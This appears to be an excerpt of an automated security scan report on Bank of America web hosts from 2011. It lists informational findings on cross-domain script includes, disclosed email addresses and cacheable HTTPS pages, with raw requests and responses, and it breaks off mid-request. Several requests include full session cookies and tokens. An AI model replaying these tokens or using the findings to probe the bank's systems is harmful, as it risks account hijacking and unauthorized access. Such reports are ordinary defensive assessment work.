Content-Type: text/html;charset=UTF-8
Content-Length: 27134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta content="tex
...[SNIP]...
<meta name="google-site-verification" content="w_aPC7FY1aXXQNDVNWnsN5fw6TKKB9XIUhqNJ76oAdE" />
<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js" type="text/javascript"></script>
...[SNIP]...

10.18. http://homeloans.bankofamerica.com/en/home.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/en/home.jsp

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /en/home.jsp HTTP/1.1
Host: homeloans.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:14:48 GMT
Pragma:
Cache-Control: max-age=1800, public
Expires: Thu, 6 Oct 2011 14:44:49 GMT
Last-Modified: Tue, 27 Sep 2011 18:30:13 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 27134
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta content="tex
...[SNIP]...
<meta name="google-site-verification" content="w_aPC7FY1aXXQNDVNWnsN5fw6TKKB9XIUhqNJ76oAdE" />
<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js" type="text/javascript"></script>
...[SNIP]...

10.19. http://homeloans.bankofamerica.com/en/learning-center/glossary.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/en/learning-center/glossary.html

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /en/learning-center/glossary.html HTTP/1.1
Host: homeloans.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:14:46 GMT
Pragma:
Cache-Control: max-age=1800, public
Expires: Thu, 6 Oct 2011 14:44:46 GMT
Last-Modified: Thu, 08 Sep 2011 19:13:04 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 23264
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta content="tex
...[SNIP]...
<meta content="" name="keywords"/>

<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js" type="text/javascript"></script>
...[SNIP]...

10.20. http://homeloans.bankofamerica.com/en/our-commitment.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/en/our-commitment.html

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /en/our-commitment.html HTTP/1.1
Host: homeloans.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:14:45 GMT
Pragma:
Cache-Control: max-age=1800, public
Expires: Thu, 6 Oct 2011 14:44:45 GMT
Last-Modified: Thu, 08 Sep 2011 16:28:50 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 17245
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta content="tex
...[SNIP]...
<meta content="" name="keywords"/>

<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js" type="text/javascript"></script>
...[SNIP]...

10.21. http://homeloans.bankofamerica.com/en/service-and-support.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/en/service-and-support.html

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /en/service-and-support.html HTTP/1.1
Host: homeloans.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:14:45 GMT
Pragma:
Cache-Control: max-age=1800, public
Expires: Thu, 6 Oct 2011 14:44:45 GMT
Last-Modified: Wed, 05 Oct 2011 20:28:29 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 14764
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta content="tex
...[SNIP]...
<meta content="bank of america home loans customer service, bank of america mortgage customer support" name="keywords"/>

<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js" type="text/javascript"></script>
...[SNIP]...

10.22. http://homeloans.bankofamerica.com/en/service-and-support/homeowner-relief/find-a-solution.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/en/service-and-support/homeowner-relief/find-a-solution.html

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /en/service-and-support/homeowner-relief/find-a-solution.html HTTP/1.1
Host: homeloans.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:14:46 GMT
Pragma:
Cache-Control: max-age=1800, public
Expires: Thu, 6 Oct 2011 14:44:46 GMT
Last-Modified: Thu, 08 Sep 2011 16:22:56 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 14738
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta content="tex
...[SNIP]...
<meta content="homeowner relief, homeowner relief program" name="keywords"/>

<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js" type="text/javascript"></script>
...[SNIP]...

10.23. http://homeloans.bankofamerica.com/en/site-map.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/en/site-map.html

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /en/site-map.html HTTP/1.1
Host: homeloans.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:14:47 GMT
Pragma:
Cache-Control: max-age=1800, public
Expires: Thu, 6 Oct 2011 14:44:47 GMT
Last-Modified: Thu, 08 Sep 2011 19:53:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 25040
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta content="tex
...[SNIP]...
<meta content="" name="keywords"/>

<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js" type="text/javascript"></script>
...[SNIP]...

10.24. http://homeloans.bankofamerica.com/es/home.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/es/home.html

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /es/home.html HTTP/1.1
Host: homeloans.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:14:43 GMT
Pragma:
Cache-Control: max-age=1800, public
Expires: Thu, 6 Oct 2011 14:44:43 GMT
Last-Modified: Thu, 08 Sep 2011 15:46:11 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 27045
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"><head><meta content="tex
...[SNIP]...
<meta name="google-site-verification" content="w_aPC7FY1aXXQNDVNWnsN5fw6TKKB9XIUhqNJ76oAdE" />
<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js" type="text/javascript"></script>
...[SNIP]...

10.25. http://homeloans.bankofamerica.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /favicon.ico HTTP/1.1
Host: homeloans.bankofamerica.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn; state=CT; JSESSIONID=475F62F0B39EAB83BB580E4F6C4552A9; CMAVID=50021315153052143970353; throttle_value=72; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; NSC_CbolPgBnfsjdb=445b32097852

Response

HTTP/1.1 404 Not Found
Date: Thu, 06 Oct 2011 13:42:16 GMT
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 10204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta content="tex
...[SNIP]...
<meta content="" name="keywords"/>

<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js" type="text/javascript"></script>
...[SNIP]...

11. Email addresses disclosed previous next
There are 3 instances of this issue:

http://homeloans.bankofamerica.com/docroot/js/lib/jquery.dimensions.js
https://privacyassist.bankofamerica.com/gs/english/Contact.asp
https://www9.bankofamerica.com/insurance/tools/faqs.go

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

11.1. http://homeloans.bankofamerica.com/docroot/js/lib/jquery.dimensions.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/docroot/js/lib/jquery.dimensions.js

Issue detail

The following email addresses were disclosed in the response:

brandon.aaron@gmail.com
paul.bakaus@googlemail.com

Request

GET /docroot/js/lib/jquery.dimensions.js HTTP/1.1
Host: homeloans.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://homeloans.bankofamerica.com/en/home-loan-experience.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn; state=CT; JSESSIONID=475F62F0B39EAB83BB580E4F6C4552A9; CMAVID=50021315153052143970353; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; cmRS=&t1=1317908551715&t2=1317908567194&t3=1317908615946&lti=1317908614397&ln=NavHomeLoanGuide&hr=http%3A//homeloans.bankofamerica.com/en/home-loan-experience.html&fti=&fn=&ac=&fd=&uer=&fu=&pi=MHEI%3AMKT%3Amortgage%3ACD1en%3BHome&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:43:03 GMT
Pragma:
Cache-Control: max-age=1800, public
Expires: Thu, 6 Oct 2011 14:13:03 GMT
ETag: W/"3442-1237122890000"
Last-Modified: Sun, 15 Mar 2009 13:14:50 GMT
Vary: Accept-Encoding
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3442

/* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* $LastCha
...[SNIP]...

11.2. https://privacyassist.bankofamerica.com/gs/english/Contact.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://privacyassist.bankofamerica.com
Path:	/gs/english/Contact.asp

Issue detail

The following email address was disclosed in the response:

customerservice@privacyassist.bankofamerica.com

Request

GET /gs/english/Contact.asp HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18590
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 13:55:25 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-US">
<head>
<Meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

...[SNIP]...
<a href="mailto:customerservice@privacyassist.bankofamerica.com">customerservice@privacyassist.bankofamerica.com</a>
...[SNIP]...

11.3. https://www9.bankofamerica.com/insurance/tools/faqs.go previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/insurance/tools/faqs.go

Issue detail

The following email address was disclosed in the response:

spam@uce.gov

Request

GET /insurance/tools/faqs.go HTTP/1.1
Host: www9.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:40:15 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: SAMEORIGIN
Cache-Control: no-cache
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 158272

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>

<
...[SNIP]...
<p>If you receive an email that you think may be a phishing scam, you should report the email by forwarding it to the following addresses: spam@uce.gov and the Anti-Phishing Working Group at reportphishing@antiphishing.org. The Anti-Phishing Working Group is a collective organization created to combat phishing fraud, consisting of 680 member companie
...[SNIP]...

12. Cacheable HTTPS response previous next
There are 10 instances of this issue:

https://pages.emcom.bankofamerica.com/
https://pages.emcom.bankofamerica.com/favicon.ico
https://pages.emcom.bankofamerica.com/sourcepoint/
https://privacyassist.bankofamerica.com/Pages2/English/ForgotPINNo.asp
https://privacyassist.bankofamerica.com/gs/english/Contact.asp
https://privacyassist.bankofamerica.com/gs/english/Policies.asp
https://privacyassist.bankofamerica.com/neworder.aspx
https://www2.bankofamerica.com/cferror.cgi
https://www9.bankofamerica.com/home-loans/surveyInitPopupAction.go
https://www9.bankofamerica.com/insurance/surveyInitPopupAction.go

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

12.1. https://pages.emcom.bankofamerica.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://pages.emcom.bankofamerica.com
Path:	/

Request

GET / HTTP/1.1
Host: pages.emcom.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; state=CT; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1317909171194

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:54:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1189

<html>
<head>
<title>Problem Loading Page</title>
</head>
<BODY bgcolor ="EEEEEE">
<table cellpadding=0 cellspacing=0 width="100%"
...[SNIP]...

12.2. https://pages.emcom.bankofamerica.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://pages.emcom.bankofamerica.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: pages.emcom.bankofamerica.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; state=CT; 